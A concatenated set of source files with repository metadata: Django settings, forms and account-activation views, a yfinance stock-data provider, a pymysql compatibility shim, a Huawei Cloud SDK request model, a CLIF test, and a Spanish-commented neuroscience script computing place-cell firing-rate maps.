TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR,'static')
#media
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
#配置ckeditor
CKEDITOR_UPLOAD_PATH = 'upload/'
|
[
"original_sin@163.com"
] |
original_sin@163.com
|
2a09d365cb4047774eb081599078201fca564efa
|
4d8cfbfe6498d0808eefa8983b07940e006c49fb
|
/ges/forms.py
|
7da85805e7e5201851422ce41a3674ddf51edaf3
|
[] |
no_license
|
nikolzp/ges_google
|
4b7d18e4fa039a0d4b21e5d71b2a249df958ed2b
|
fe89f150a624411867877491f127d71eff92bfc9
|
refs/heads/master
| 2020-03-12T00:59:24.072648
| 2018-04-20T14:43:38
| 2018-04-20T14:43:38
| 130,363,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 407
|
py
|
from django import forms
class GesFilterForm(forms.Form):
    """Optional numeric filter bounds for hydroelectric-station listings."""
    # NOTE(review): the Russian labels read "от" (from) on the ``max_*``
    # fields and "до" (to) on the ``min_*`` fields — names and labels look
    # swapped; confirm against the view that consumes this form.
    max_power = forms.IntegerField(label='Мощность от МВт', required=False)
    min_power = forms.IntegerField(label='Мощность до МВт', required=False)
    max_area = forms.IntegerField(label='Объем от кв.км', required=False)
    min_area = forms.IntegerField(label='Объем до кв.км', required=False)
|
[
"nikolzp@gmail.com"
] |
nikolzp@gmail.com
|
95abb0d40ff2d7df34f470a31b6ed10e507c4cec
|
330e77e53d580a73e883e705b6bc8caca3456194
|
/accounts/views.py
|
611d57e964b7819e514d81af3de9be2323a30ba3
|
[] |
no_license
|
Chandan-97/CyTin
|
d2995970eade13ec46c7874ecb5c2922328e5367
|
e8612124a52a307a44c6833ddefe02b06a50c919
|
refs/heads/master
| 2020-03-10T11:39:18.188372
| 2018-04-13T04:26:01
| 2018-04-13T04:26:01
| 129,360,932
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,451
|
py
|
from django.shortcuts import render, redirect, HttpResponse
from django.contrib.auth import *
from .form import LoginForm, RegisterForm, RequestnewForm
from django.contrib.sites.shortcuts import get_current_site
from django.utils.encoding import force_bytes, force_text
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.template.loader import render_to_string
from .tokens import account_activation_token
import sendgrid
import os
from sendgrid.helpers.mail import *
# Create your views here.
def login_view(request):
    """Render the login form; on a valid POST, log the user in and redirect home."""
    form = LoginForm(request.POST or None)
    # Getting Values from form and validation
    if form.is_valid(): # clean() from forms.py is called
        username = form.cleaned_data.get("username")
        password = form.cleaned_data.get("password")
        # print(username)
        # print(password)
        #user is available
        # NOTE(review): authenticate() returns None for bad credentials and
        # login(request, None) raises — presumably LoginForm.clean() already
        # verified the credentials; confirm before relying on this path.
        user = authenticate(username=username, password=password)
        login(request, user)
        print (request.user.is_authenticated())
        return redirect("/")
    # Send it to render into page "login_form.html"
    return render(request, "login_form.html", {"form" : form})
def logout_view(request):
    """Log the current session out and show the login page again."""
    logout(request)
    # Debug aid: should now print False.
    print(request.user.is_authenticated())
    return render(request, "login_form.html", {})
def requestnew_view(request):
    """Let an authenticated user submit a request for new software.

    Anonymous visitors are redirected to the login page.
    """
    user = request.user
    if(user.is_authenticated() == False):
        return redirect("/login")
    form = RequestnewForm(request.POST or None)
    if form.is_valid():
        Software = form.save(commit=False)
        Software.software = form.cleaned_data.get("Software")
        # Optional fields are only copied onto the model when present.
        if(form.cleaned_data.get("Version")):
            Software.version = form.cleaned_data.get("Version")
        if(form.cleaned_data.get("Comment")):
            Software.comment = form.cleaned_data.get("Comment")
        Software.save()
    return render(request, "requestnew_form.html", {"form" : form})
def register_view(request):
    """Create an inactive account and email an activation token via SendGrid."""
    print(request.user.is_authenticated())
    form = RegisterForm(request.POST or None)
    if form.is_valid():
        user = form.save(commit=False)
        password = form.cleaned_data.get("password")
        user.set_password(password)
        # The account stays inactive until the emailed token is confirmed
        # by the activate() view below.
        user.is_active = False
        user.save()
        # NOTE(review): current_site is computed but never used, and the
        # email body carries only the raw token — not an activation URL —
        # so the recipient has no link to click; confirm the intended flow.
        current_site = get_current_site(request)
        sg = sendgrid.SendGridAPIClient(apikey=os.environ.get('SENDGRID_API_KEY'))
        from_email = Email("iamoneofmykind@gmail.com")
        to_email = Email(form.cleaned_data.get("email"))
        subject = "Activate your CyTin account"
        content = Content("text/plain", account_activation_token.make_token(user))
        mail = Mail(from_email, subject, to_email, content)
        response = sg.client.mail.send.post(request_body=mail.get())
        return HttpResponse('Please confirm your email address to complete the registration')
    else:
        form = RegisterForm()
        return render(request, "login_form.html", {"form":form})
        # new_user = authenticate(username=user.username, password=user.password)
        # login(request, user)
        # print(request.user.is_authenticated())
        # return redirect("/")
    # return render(request, "login_form.html", {"form" : form})
def activate(request, uidb64, token):
    """Activate a user account from an emailed confirmation link.

    Decodes the base64 user id, verifies the activation token, then marks
    the account active and logs the user in.

    Bug fixed: ``User`` was never imported — the star-import of
    ``django.contrib.auth`` at the top of this file does not export the
    model — so every request raised NameError (which the except clause
    could not even evaluate). Imported locally to keep the fix
    self-contained; assumes the project uses Django's default User model —
    TODO confirm against settings.AUTH_USER_MODEL.
    """
    from django.contrib.auth.models import User
    try:
        uid = force_text(urlsafe_base64_decode(uidb64))
        user = User.objects.get(pk=uid)
    except(TypeError, ValueError, OverflowError, User.DoesNotExist):
        user = None
    if user is not None and account_activation_token.check_token(user, token):
        user.is_active = True
        user.save()
        login(request, user)
        return HttpResponse('Thank you for your email confirmation. Now you can login your account.')
    else:
        return HttpResponse('Activation link is invalid!')
|
[
"cp564738@gmail.com"
] |
cp564738@gmail.com
|
236c4133d1ff95f11a4ce5df03a7b6a671f566ba
|
1ebf1d957e81555baade65fdb57041b914736f3b
|
/com/ddm/tradingbot/data/provider/yFinanceProvider.py
|
692210494e27557bbe045782244c9be7186fb79e
|
[] |
no_license
|
damenv/trabot
|
a777204d3459b86e01742db3d59f7ae2be43a283
|
08633722ba1a4a7fbbca162af9308f596196824f
|
refs/heads/master
| 2022-12-17T21:09:21.725391
| 2020-09-19T18:31:16
| 2020-09-19T18:31:16
| 290,363,026
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,069
|
py
|
"""
Using yfinance library to obtain the stock data
"""
import datetime as dt
import yfinance as yf
import pandas as pd
from com.ddm.tradingbot.data.provider.providerBase import providerBase
class yFinanceProvider(providerBase):
    """providerBase implementation backed by the yfinance library."""

    ticker = ""
    valor = "yyyiii"  # leftover debug value — appears unused; TODO confirm before removing

    def __init__(self, ticker):
        self.ticker = ticker

    def getOHLCV(self, ticker_list, start_date, end_date) -> dict:
        """Download an OHLCV DataFrame for each ticker in *ticker_list*.

        Bug fixed: the dict was built but never returned (callers always
        got None). Note: a single-ticker overload with the same name was
        defined above this one and silently shadowed by this definition
        (Python keeps only the last ``def``); the dead overload has been
        removed — the live signature is unchanged.
        """
        ohlcv_data = {}
        for ticker in ticker_list:
            ohlcv_data[ticker] = yf.download(ticker, start_date, end_date)
        return ohlcv_data

    def getClosePrice(self, start_date, end_date, interval) -> dict:
        """Adjusted close prices for ``self.ticker`` over the date range.

        NOTE(review): *interval* is accepted but never forwarded to
        yf.download — confirm whether it should be passed through.
        """
        return yf.download(self.ticker, start_date, end_date)["Adj Close"]

    def getClosePrice_list(self, ticker_list: list, start_date, end_date) -> dict:
        """Adjusted close prices for each ticker, one column per ticker."""
        close_price = pd.DataFrame()
        for ticker in ticker_list:
            close_price[ticker] = yf.download(ticker, start_date, end_date)["Adj Close"]
        return close_price
|
[
"damen1105@gmail.com"
] |
damen1105@gmail.com
|
2180fbd40a9cda6cf6e7180218f7f525f2c351ce
|
664269ec1346b69b1af11d041d5352921ebef060
|
/sample-apps/rds/sample-app/src/pymysql/_compat.py
|
252789ec4460a3ee383f18f8af26e42ba82b666d
|
[
"Apache-2.0"
] |
permissive
|
awslabs/aws-servicebroker
|
0f288d4da0201a85e99f27bf7d95cc84d30d2f93
|
b28f42ad1e5861fd3009a10ad4bd511a384d3943
|
refs/heads/main
| 2023-08-30T01:09:05.351854
| 2023-07-06T18:09:22
| 2023-07-06T18:09:22
| 125,404,208
| 468
| 165
|
Apache-2.0
| 2023-08-30T14:07:12
| 2018-03-15T17:36:28
|
Python
|
UTF-8
|
Python
| false
| false
| 481
|
py
|
import sys
PY2 = sys.version_info[0] == 2
PYPY = hasattr(sys, 'pypy_translation_info')
JYTHON = sys.platform.startswith('java')
IRONPYTHON = sys.platform == 'cli'
CPYTHON = not PYPY and not JYTHON and not IRONPYTHON
if PY2:
import __builtin__
range_type = xrange
text_type = unicode
long_type = long
str_type = basestring
unichr = __builtin__.unichr
else:
range_type = range
text_type = str
long_type = int
str_type = str
unichr = chr
|
[
"jmmccon@amazon.com"
] |
jmmccon@amazon.com
|
bf1b684d24bbc4cf5a7179c2bf9f39cda4883aac
|
f9d564f1aa83eca45872dab7fbaa26dd48210d08
|
/huaweicloud-sdk-eihealth/huaweicloudsdkeihealth/v1/model/delete_nextflow_job_request.py
|
83b25425a82c6befc3917dc50bb320e6b8812723
|
[
"Apache-2.0"
] |
permissive
|
huaweicloud/huaweicloud-sdk-python-v3
|
cde6d849ce5b1de05ac5ebfd6153f27803837d84
|
f69344c1dadb79067746ddf9bfde4bddc18d5ecf
|
refs/heads/master
| 2023-09-01T19:29:43.013318
| 2023-08-31T08:28:59
| 2023-08-31T08:28:59
| 262,207,814
| 103
| 44
|
NOASSERTION
| 2023-06-22T14:50:48
| 2020-05-08T02:28:43
|
Python
|
UTF-8
|
Python
| false
| false
| 4,327
|
py
|
# coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class DeleteNextflowJobRequest:
    """Generated SDK request model — prefer regenerating over hand edits.

    Attributes:
        openapi_types (dict): The key is attribute name
                            and the value is attribute type.
        attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # attribute names whose values are masked as "****" in to_dict()
    sensitive_list = []
    openapi_types = {
        'eihealth_project_id': 'str',
        'job_id': 'str'
    }
    attribute_map = {
        'eihealth_project_id': 'eihealth_project_id',
        'job_id': 'job_id'
    }
    def __init__(self, eihealth_project_id=None, job_id=None):
        """DeleteNextflowJobRequest
        The model defined in huaweicloud sdk
        :param eihealth_project_id: EIHealth project ID; click the project name in the EIHealth console and open the project settings page to view it.
        :type eihealth_project_id: str
        :param job_id: Job ID
        :type job_id: str
        """
        self._eihealth_project_id = None
        self._job_id = None
        self.discriminator = None
        self.eihealth_project_id = eihealth_project_id
        self.job_id = job_id
    @property
    def eihealth_project_id(self):
        """Gets the eihealth_project_id of this DeleteNextflowJobRequest.
        EIHealth project ID; click the project name in the EIHealth console and open the project settings page to view it.
        :return: The eihealth_project_id of this DeleteNextflowJobRequest.
        :rtype: str
        """
        return self._eihealth_project_id
    @eihealth_project_id.setter
    def eihealth_project_id(self, eihealth_project_id):
        """Sets the eihealth_project_id of this DeleteNextflowJobRequest.
        EIHealth project ID; click the project name in the EIHealth console and open the project settings page to view it.
        :param eihealth_project_id: The eihealth_project_id of this DeleteNextflowJobRequest.
        :type eihealth_project_id: str
        """
        self._eihealth_project_id = eihealth_project_id
    @property
    def job_id(self):
        """Gets the job_id of this DeleteNextflowJobRequest.
        Job ID
        :return: The job_id of this DeleteNextflowJobRequest.
        :rtype: str
        """
        return self._job_id
    @job_id.setter
    def job_id(self, job_id):
        """Sets the job_id of this DeleteNextflowJobRequest.
        Job ID
        :param job_id: The job_id of this DeleteNextflowJobRequest.
        :type job_id: str
        """
        self._job_id = job_id
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                # sensitive attributes are masked rather than serialized
                if attr in self.sensitive_list:
                    result[attr] = "****"
                else:
                    result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        import simplejson as json
        if six.PY2:
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")
        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
    def __repr__(self):
        """For `print`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, DeleteNextflowJobRequest):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
0f0b988db044a90843787fcfa17790f226c36531
|
ce1f8877fa9ff084b75bceec4cc7ddf5b3153b07
|
/clif/testing/python/imported_methods_test.py
|
be75ee040777a7e9a8efe35837f737faf0fc1cda
|
[
"Apache-2.0"
] |
permissive
|
HenriChataing/clif
|
034aba392294ac30e40801815cf4d3172d3d44bd
|
307ac5b7957424706c598876d883936c245e2078
|
refs/heads/master
| 2021-01-23T16:25:19.543400
| 2017-09-01T22:18:03
| 2017-09-01T22:18:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 968
|
py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for clif.testing.python.imported_methods."""
import unittest
from clif.testing.python import imported_methods
class InheritedConstructorsTest(unittest.TestCase):
    """Checks that constructors inherited through CLIF wrapping work."""
    def testInheritedConstructor(self):
        # 12345 must flow through the imported base-class constructor;
        # GetAWithOffset adds its argument to the stored value.
        d = imported_methods.Derived(12345)
        self.assertEqual(d.GetA(), 12345)
        self.assertEqual(d.GetAWithOffset(43210), 55555)
if __name__ == '__main__':
    unittest.main()
|
[
"mrovner@google.com"
] |
mrovner@google.com
|
81f8e0ee87794f469abaa56ecaa9a35b05cecdf7
|
33d9426e8450cc0c9a0e1f377383c066a2e9b7f0
|
/Proceso_De_Todos_los_Datos.py
|
25c788d53679b366f83c9b579c2297d6d3ddf05b
|
[] |
no_license
|
tomasgarcianeuro/Funtions_Neuro
|
33d5ffd08b6780357e692a70ebaad81c80de9c96
|
39ce501bf9a68ea96249a8f41c7d2f077a13898e
|
refs/heads/main
| 2023-01-19T20:53:03.778169
| 2020-10-26T14:47:56
| 2020-10-26T14:47:56
| 307,396,435
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,927
|
py
|
import numpy as np
import matplotlib.pyplot as plt
import pickle
from scipy.ndimage import gaussian_filter as gauss_fil
from os import listdir
# =============================================================================
# NO CORRER_ USADO COMO PLANTILLA PARA DEMOSTRACION A SUB DIR SEGUN CLAUSULA map(lambda arg: arg/2, [12, 12 ,12])
# SUB DIR SE REHUSA A CREER EN EL DEBUGGEAR ()
# =============================================================================
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""Inicializaciones fundamentales """""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""INICIALIZANDO VECTOR TEMPORAL"""
Eje_Temporal=np.zeros(Diccionario["Posicion"].T.shape[1])
for i in range(Eje_Temporal.shape[0]):
Eje_Temporal[i]=400*(i+1)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""Funciones """""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""Division de vector disparo en cluster"""
def Division_luz_oscuridad(clu,Tiempo_Luz_oscuridad):
    """Split one cluster's spike times into light and dark trial periods.

    Given *clu* (spike times of a single cluster) and *Tiempo_Luz_oscuridad*
    (rows of trial label / start / end times, where a label starting with
    "l" means light and anything else dark), returns a dict with 'Luz'
    (light) and 'Oscuridad' (dark) sub-dicts, each mapping a per-trial key
    (e.g. 'l1.0') to the spike times inside that trial's window.
    """
    inicio=0 #time at which the current light/dark period starts
    final=0 # time at which the current light/dark period ends
    cluster_aux={}
    cluster_aux['Luz']={}
    cluster_aux['Oscuridad']={}
    luz=0 #running counter so keys l1.0, l1.1, ... stay distinct
    oscuridad=0
    inicio=float(Tiempo_Luz_oscuridad[0][2]) #start time of the first event
    for i in range(Tiempo_Luz_oscuridad.shape[0]):
        final=float(Tiempo_Luz_oscuridad[i][3]) #end time of this event
        if Tiempo_Luz_oscuridad[i][1][0]=="l": #label prefix: "l" = light, otherwise dark ("d")
            tipo_luz=str(Tiempo_Luz_oscuridad[i][1][:2])+".{}"
            # argmax/argmin locate the first spike after `inicio` and the
            # first spike at/after `final`, so the slice is this trial's spikes
            cluster_aux["Luz"][tipo_luz.format(str(luz))]=clu[np.argmax(clu>inicio):np.argmin(clu<final)]
            inicio=final;luz+=1 # next period starts where this one ended
        else:
            tipo_oscuridad=str(Tiempo_Luz_oscuridad[i][1][:2])+".{}"
            cluster_aux["Oscuridad"][tipo_oscuridad.format(str(oscuridad))]=clu[np.argmax(clu>inicio):np.argmin(clu<final)]
            inicio=final;oscuridad+=1
    return cluster_aux
def Division_clu_(Cluster,tiempo):
    """Build a dict mapping 'Cluster Numero <k>' to that cluster's spike times.

    *Cluster* holds the number of clusters in row 0 followed by one cluster
    id per spike; *tiempo* holds the matching spike times, one per row.
    """
    num_clu=int(Cluster[0]) #number of clusters
    Cluster=np.delete(Cluster,0) #drop the leading cluster-count row
    Cluster=Cluster.reshape([Cluster.shape[0] ,1])
    tiempo=tiempo.reshape([ tiempo.shape[0] ,1])
    # Pair each spike's cluster id (col 0) with its time (col 1).
    Cluster=np.append(Cluster,tiempo,1)
    CLUSTERS={}
    for i in range(num_clu+1): #pre-create one (initially empty) entry per cluster
        Nombre_Vector="Cluster Numero {}"
        CLUSTERS[Nombre_Vector.format(i)]=np.array([])
    # Fill each cluster's time vector.
    for i in range(Cluster.shape[0]):
        Num_clu=Cluster[i][0] #cluster id that fired
        Num_time=Cluster[i][1] #time at which that cluster fired
        Nombre_Vector="Cluster Numero {}"
        CLUSTERS[Nombre_Vector.format(int(Num_clu))]=np.append(CLUSTERS[Nombre_Vector.format(int(Num_clu))],Num_time)
    return CLUSTERS
def Division_global(Cluster,tiempo,tiempo_l_o):
    """Combine Division_clu_ and Division_luz_oscuridad into one nested dict.

    Returns a dict with one entry per cluster ('Cluster Numero k'); each
    entry is itself a dict with 'Luz' and 'Oscuridad' sub-dicts holding the
    spike times of that cluster during light and dark trials respectively.
    NOTE(review): only clusters 1..num_clu are converted — cluster 0
    (created by Division_clu_) keeps its flat time vector.
    """
    num_clu=int(Cluster[0])
    Cluster_Principal=Division_clu_(Cluster, tiempo) #build the main dictionary
    clu_aux={}
    for i in range(num_clu):
        clu_aux=Division_luz_oscuridad(Cluster_Principal["Cluster Numero {}".format(i+1)],tiempo_l_o)
        Cluster_Principal["Cluster Numero {}".format(i+1)]=clu_aux
    return Cluster_Principal
def Cargar(name):
    """Load and return the pickled object stored in the file *name*."""
    with open(name, "rb") as handle:
        return pickle.load(handle)
def Guardar(name, objecto):
    """Pickle *objecto* into the file *name* (overwriting existing content).

    Fix: the original bound ``pickle.dump``'s return value (always None)
    to an unused variable named ``dic`` — a copy-paste leftover from
    Cargar; the pointless assignment is removed.
    """
    with open(name, "wb") as handle:
        pickle.dump(objecto, handle)
"""Cálculo de tasa de disparo, etc."""
def Disparos(clu,time):
    """Map each spike time to the index of the time-axis bin containing it.

    For each spike time clu[i] the returned element is the index j with
    time[j] <= clu[i] < time[j+1], i.e. the position sample (index into the
    temporal axis) during which the spike occurred.

    Fixes over the original linear scan:
    - the original `while Condicion:` loop never cleared its flag, so a spike
      earlier than time[0] (or an unsorted `clu`) scanned off the end of
      `time` and raised IndexError; np.searchsorted handles any ordering.
    - vectorized: O((n+m) log m) instead of a Python-level walk.

    Returns a float64 array (same dtype as the original np.insert-built one).
    """
    # side='right' gives the first edge strictly greater than the spike;
    # subtracting 1 yields the containing bin, matching >= lower / < upper.
    posicion_disparo = np.searchsorted(time, clu, side='right') - 1
    return posicion_disparo.astype(np.float64)
def Cuentas(disp_clu,posx,posy,bins):
    """Accumulate spike counts on a square spatial grid.

    disp_clu holds, per spike, the index of the position sample at which it
    fired (output of Disparos); posx/posy are the tracked coordinates.  The
    arena is assumed to span 900 units per side, split into 900/bins cells.
    Returns the (cells x cells) count matrix.
    """
    lado = int(900 / bins)          # cells per side of the grid
    conteo = np.zeros([lado, lado])
    xs = list(posx)
    ys = list(posy)
    for idx_f in disp_clu:
        idx = int(idx_f)            # position-sample index of this spike
        fila = int(ys[idx] / bins)  # row from the y coordinate
        col = int(xs[idx] / bins)   # column from the x coordinate
        conteo[fila][col] += 1
    return conteo
def Tiempo(posx,posy,bins):
    """Total occupancy per spatial cell, in 20 kHz ticks.

    Each position sample spans 400 ticks; samples where both coordinates are
    -1 mark tracking loss and are skipped.  Divide the returned matrix by
    20000 to express it in seconds (see Tiempo_2, which does so internally).
    """
    lado = int(900 / bins)
    ocupacion = np.zeros([lado, lado])
    xs = list(posx)
    ys = list(posy)
    for i in range(posx.shape[0]):
        if ys[i] == -1 and xs[i] == -1:   # tracking lost: skip sample
            continue
        ocupacion[int(ys[i] / bins)][int(xs[i] / bins)] += 400
    return ocupacion
def Tiempo_2(Dicc,bins,type_fuente):
    """Occupancy map in seconds, restricted to trials of one light source.

    Dicc["Light_Trials"] is a 60-row string table whose columns are
    (label, source id, start tick, end tick); Dicc["Posicion"] is the Nx2
    tracked-position array.  Only trials whose source id equals
    *type_fuente* contribute.
    """
    lado = int(900 / bins)
    ocupacion = np.zeros([lado, lado])
    trials = Dicc["Light_Trials"]
    pos_x = Dicc["Posicion"].T[0]
    pos_y = Dicc["Posicion"].T[1]
    for t in range(60):
        if trials[t][1] != type_fuente:
            continue
        # Interval bounds are 20 kHz tick counts stored as strings;
        # dividing by 400 converts them into position-sample indices.
        ini = int(int(trials[t][2]) / 400)
        fin = int(int(trials[t][3]) / 400) + 1
        xs = list(pos_x[ini:fin])
        ys = list(pos_y[ini:fin])
        for j in range(len(xs)):
            if ys[j] == -1 and xs[j] == -1:   # tracking lost
                continue
            ocupacion[int(ys[j] / bins)][int(xs[j] / bins)] += 400
    return ocupacion / 20000  # 20 kHz ticks -> seconds
def Tasa_disparo(cuenta,tiempo):
    """Element-wise firing rate: spike count divided by occupancy time.

    Cells never visited (tiempo == 0) keep a rate of 0 rather than dividing
    by zero.

    Fix: the original nested loops iterated ``cuenta.shape[0]`` on BOTH axes,
    silently dropping columns of any non-square input; the masked np.divide
    is correct for rectangular matrices and vectorized.
    """
    tasa_verdadera = np.zeros(cuenta.shape)
    np.divide(cuenta, tiempo, out=tasa_verdadera, where=tiempo != 0)
    return tasa_verdadera
def Cluster_type_light_(Diccionario,bins,luz_oscuridad,type_fuente,num_clu,Eje_Temporal):
    """Plot the Gaussian-smoothed firing-rate map of one cluster for one
    light source under one light condition.

    Gathers every trial key "<type_fuente>.<i>" (i in 0..29) present for the
    given cluster/condition, converts the pooled spike times to position
    indices, and divides the spatial spike counts by the per-source
    occupancy (Tiempo_2) before filtering and displaying with imshow.
    """
    cluster_key = "Cluster Numero {}".format(str(num_clu))
    trial_key = "{}{}".format(str(type_fuente), ".{}")
    condicion = Diccionario[cluster_key][luz_oscuridad]
    pooled = np.array([])
    # Pool the spike times of every trial recorded with this light source.
    for trial in range(30):
        key = trial_key.format(trial)
        if key in condicion:
            pooled = np.concatenate((pooled, condicion[key]))
    shots = Disparos(pooled, Eje_Temporal)                 # spike -> sample index
    cuenta = Cuentas(shots, Diccionario["Posicion"].T[0], Diccionario["Posicion"].T[1], bins)
    tiempo = Tiempo_2(Diccionario, bins, type_fuente)      # occupancy in seconds
    tasa = Tasa_disparo(cuenta, tiempo)
    suavizada = gauss_fil(tasa, 3)
    plt.imshow(suavizada, cmap="jet")
    # plt.imshow(tasa, cmap="jet")  # alternative: show the raw, unfiltered map
def Generador_Dicc(Datos_brutos):
    """Build and save one refined data dictionary per recording session.

    For each animal code in *Datos_brutos*, lists that animal's session
    directories on disk, loads the raw .clu/.res/.light_trials_intervals/.whl
    files, refines them with Division_global, and pickles the result with
    Guardar.  All paths are hard-coded to this machine's layout.
    """
    for k in Datos_brutos:
        datos={}
        # Base directory for this animal; the {} is filled with the animal code.
        Nombre_animales="/home/tomasg/Escritorio/Neuro/data_perez_escobar_2016/circular_arena/{}" #Debo indicar el nombre del animal
        List_ses=listdir(Nombre_animales.format(k))
        Sessiones=[] #List of session date codes
        for i in List_ses:
            # Directory names look like "<animal>-<date>2015-0108"; keep the
            # part between the first '-' and "2015" as the session id.
            Ses=i[i.find("-")+1:i.find("2015")]
            Sessiones.append(Ses)
        # Template with slots for animal (x3) / session (x2) / file extension.
        Nombre2="/home/tomasg/Escritorio/Neuro/data_perez_escobar_2016/circular_arena/{}/{}-{}2015-0108/{}-{}2015-0108.{}"
        Nombre1="{}-{}2015-0108".format(k,"{}")
        Nombre_clu=Nombre2.format(k,k,"{}",k,"{}","clu")
        Nombre_res=Nombre2.format(k,k,"{}",k,"{}","res")
        Nombre_light=Nombre2.format(k,k,"{}",k,"{}","light_trials_intervals")
        Nombre_whl=Nombre2.format(k,k,"{}",k,"{}","whl")
        # Load the raw per-session files that feed the refinement step.
        for i in Sessiones:
            datos[Nombre1.format(i)]={"Clu":np.loadtxt(Nombre_clu.format(i,i)),"Res":np.loadtxt(Nombre_res.format(i,i)),"Light":np.loadtxt(Nombre_light.format(i,i),dtype=str)}
        """Cargo los archivos"""
        # Destination path/name template for the pickled dictionaries.
        Nombre_Guardar="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/Diccionarios_Datos/{}/Diccionario_{}"
        """Refino y guardo los datos"""
        Dic={}
        for l in Sessiones:
            Dic=Division_global(datos[Nombre1.format(l)]["Clu"], datos[Nombre1.format(l)]["Res"], datos[Nombre1.format(l)]["Light"])
            Dic["Posicion"]=np.loadtxt(Nombre_whl.format(l,l)) # add tracked positions
            # NOTE(review): Nombre1 has a single placeholder, so the second
            # argument to .format here is silently ignored — harmless but
            # probably a copy-paste slip; confirm.
            Dic["Light_Trials"]=datos[Nombre1.format(l,l)]["Light"] # add the light/dark interval table
            Guardar(Nombre_Guardar.format(k,l),Dic) # l is the session, k the animal code
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""Genero los diccionarios principales"""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Animal=['jp2142', 'jp21414']
Generador_Dicc(Animal)
Nombre1="jp19844-{}2015-0108" #Codigo principal que hace referencia al nombre de la rata
jp19844={}
Sessiones=["0908","1108","1208","1308","2008","2608"] #Fechas de las sessiones de grabacion
Nombre_clu="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/{}.clu".format(Nombre1)
Nombre_res="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/{}.res".format(Nombre1)
Nombre_light="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/{}.light_trials_intervals".format(Nombre1)
Nombre_whl="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/{}.whl".format(Nombre1)
#En el siguiente apartado cargo los datos principales para refinar los datos
for i in Sessiones:
jp19844[Nombre1.format(i)]={"Clu":np.loadtxt(Nombre_clu.format(str(i))),"Res":np.loadtxt(Nombre_res.format(str(i))),"Light":np.loadtxt(Nombre_light.format(str(i)),dtype=str)}
"""Cargo los archivos"""
#Abajo indico la ruta y el nombre con el que se guardaran los archivos
Nombre_Guardar="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/Diccionarios_Datos/jp19844/Diccionario_{}"
"""Refino y guardo los datos"""
Dic={}
for l in Sessiones:
Dic=Division_global(jp19844[Nombre1.format(l)]["Clu"], jp19844[Nombre1.format(l)]["Res"], jp19844[Nombre1.format(l)]["Light"])
Dic["Posicion"]=np.loadtxt(Nombre_whl.format(l)) #Agrego al diccionario los datos de la posicion
Dic["Light_Trials"]=jp19844[Nombre1.format(l)]["Light"] #Agrego al diccionario los datos de intervalos de luz y oscuridad utilizados
Guardar(Nombre_Guardar.format(l),Dic)
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""Calculo de tasa de disparo"""""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""En esta parte del codigo determino la tasa de disparo de la siguiente manera:
1) Determino una matriz con los disparos para UN cluster
la matriz es una representacion cuadricular del espacio. Cada elemento de la matriz representa una porcion del espacio físico por donde el animal se mueve
2) Determino una matriz del mismo tamaño con el tiempo que estuvo el animal en dicho lugar físico
3) Determino, con una division elemento a elemento, la tasa de disparo del animal en dicho lugar
4) A la matriz resultante Tasa_de_disparo le aplico un filtro gaussiano para suavizar la imagen
5) Grafico el resultado """
#Antes que nada se cargan los elementos a aplicar el proceso antes descripto
# =============================================================================
# Modo MANUAL, modo de ejemplo solicitado por Sub. Dir
# =============================================================================
Name="jp5519"
Datos_Animal="{}/Diccionario_{}".format(Name,"0610")
Nombre_Carga="/home/tomasg/Escritorio/Neuro/Lectura de Datos/Generacion de Dicc_Clu/Diccionarios_Datos/{}".format(Datos_Animal)
